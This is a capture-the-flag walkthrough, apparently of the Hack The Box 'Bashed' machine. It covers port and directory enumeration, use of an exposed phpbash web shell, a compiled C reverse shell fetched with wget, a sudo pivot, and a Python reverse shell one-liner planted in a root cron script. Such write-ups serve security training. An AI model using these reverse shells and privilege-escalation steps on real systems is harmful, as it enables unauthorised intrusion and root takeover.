I run nmap and found the port 80 open.
❯ ports=$(nmap -p- -T4 -Pn -n $(gettarget) | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) ❯ echo $ports 80 ❯ nmap -sC -sV -p$ports -Pn 10.129.106.102 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 18:15 BST Nmap scan report for 10.129.106.102 Host is up (0.048s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
The web appears to be the only service, so I go to check it:
Interesting, it looks like this server has uploaded a file called “phpbash”, if we click on the “phpbash” title, it takes us to another page with a link to the “phpbash” GitHub repository:
The page tells us that the “phpbash” is developed on this exact server, and the GitHub description says “phpbash is a semi-interactive PHP shell compressed into a single file”. If the “phpbash” file is really on this server could be very useful as a foothold.
I tried a few different URL router trying to find the phpbash file, but without success, so I used gobuster to scan for directories, and I found some interesting ones:
❯ gobuster dir -u http://10.129.106.102 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.129.106.102 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/05/08 18:31:00 Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 317] [--> http://10.129.106.102/images/] /uploads (Status: 301) [Size: 318] [--> http://10.129.106.102/uploads/] /php (Status: 301) [Size: 314] [--> http://10.129.106.102/php/] /css (Status: 301) [Size: 314] [--> http://10.129.106.102/css/] /dev (Status: 301) [Size: 314] [--> http://10.129.106.102/dev/] /js (Status: 301) [Size: 313] [--> http://10.129.106.102/js/] /fonts (Status: 301) [Size: 316] [--> http://10.129.106.102/fonts/]
I tried some of the directories, and finally found the phpbash shell on “http://10.129.106.102/dev/phpbash.php”:
I made a quick enumeration and found the flag on the “/home/arrexel/” directory, luckily for me the user.txt file have read permissions to “others”, so I was able to read it.
First I created a reverse shell, just for commodity. I tried a bash reverse shell, but without success, so I ended up downloading a C reverse shell and uploaded the compiled binary to the target:
❯ git clone https://github.com/izenynn/c-reverse-shell.git [...] ❯ cd c-reverse-shell # the repo includes a script to quickly change the ip and port, so we don't need to edit the code ❯ ./change_client.sh 10.10.14.93 4444 Done! # now compile! ❯ make [...] ❯ python3 -m http.server 8080 [...]
I downloaded the binary on the target and executed it:
www-data@bashed:/dev/shm# wget 10.10.14.93:8080/reverse.elf [...] # chmod +x doesn't work www-data@bashed:/dev/shm# chmod 711 reverse.elf www-data@bashed:/dev/shm# ./reverse.elf
I upgraded the shell:
❯ nc -lvvnp 4444 listening on [any] 4444 ... connect to [10.10.14.93] from (UNKNOWN) [10.129.106.102] 54798 python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@bashed:/dev/shm$ export TERM=xterm www-data@bashed:/dev/shm$ ^Z ❯ stty raw -echo; fg www-data@bashed:/dev/shm$
We are ready, time for upload the linpeas.sh file for a quick enumeration.
I found something interesting:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL
I can run commands as the “scriptmanager” user, so let’s open a bash session with that user:
www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash scriptmanager@bashed:/dev/shm$
I run linpeas.sh again as scriptmanager user, to see what we can do with this user. I found that the scriptmanager user owns a directory called “scripts” on “/”:
╔══════════╣ Unexpected in root /scripts /initrd.img /vmlinuz ╔══════════╣ Modified interesting files in the last 5mins (limit 100) /scripts/test.txt /home/scriptmanager/.gnupg/trustdb.gpg /home/scriptmanager/.gnupg/pubring.gpg /home/scriptmanager/.gnupg/gpg.conf /var/log/auth.log /var/log/syslog
It contains two files:
scriptmanager@bashed:/dev/shm$ ls -la /scripts/ total 16 drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 . drwxr-xr-x 23 root root 4096 Dec 4 2017 .. -rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py -rw-r--r-- 1 root root 12 May 8 10:17 test.txt
According to linpeas.sh, the “test.txt” file was modified in the last 5 minutes, that’s strange.
If we take a look at the “test.py” and “test.txt” files, we notice that “test.txt” is a file created by the script “test.py”. So, if “test.txt” was modified in the last 5 minutes and it’s a file that “test.py” creates, we can assume “test.py” is running on a cron, probably by root because is the owner of the “test.txt” file.
I modified the “test.py” file with nano, so the script now contains a python reverse shell, so now I only have to listen with netcat and wait, and the next time root executes “test.py” I will get the reverse shell as root.
scriptmanager@bashed:/scripts$ cat test.py import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.93",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
After waiting a few seconds I got the reverse shell:
❯ nc -lvvnp 5555 listening on [any] 5555 ... connect to [10.10.14.93] from (UNKNOWN) [10.129.106.102] 37980 # whoami whoami root #
And that’s all! I’m root.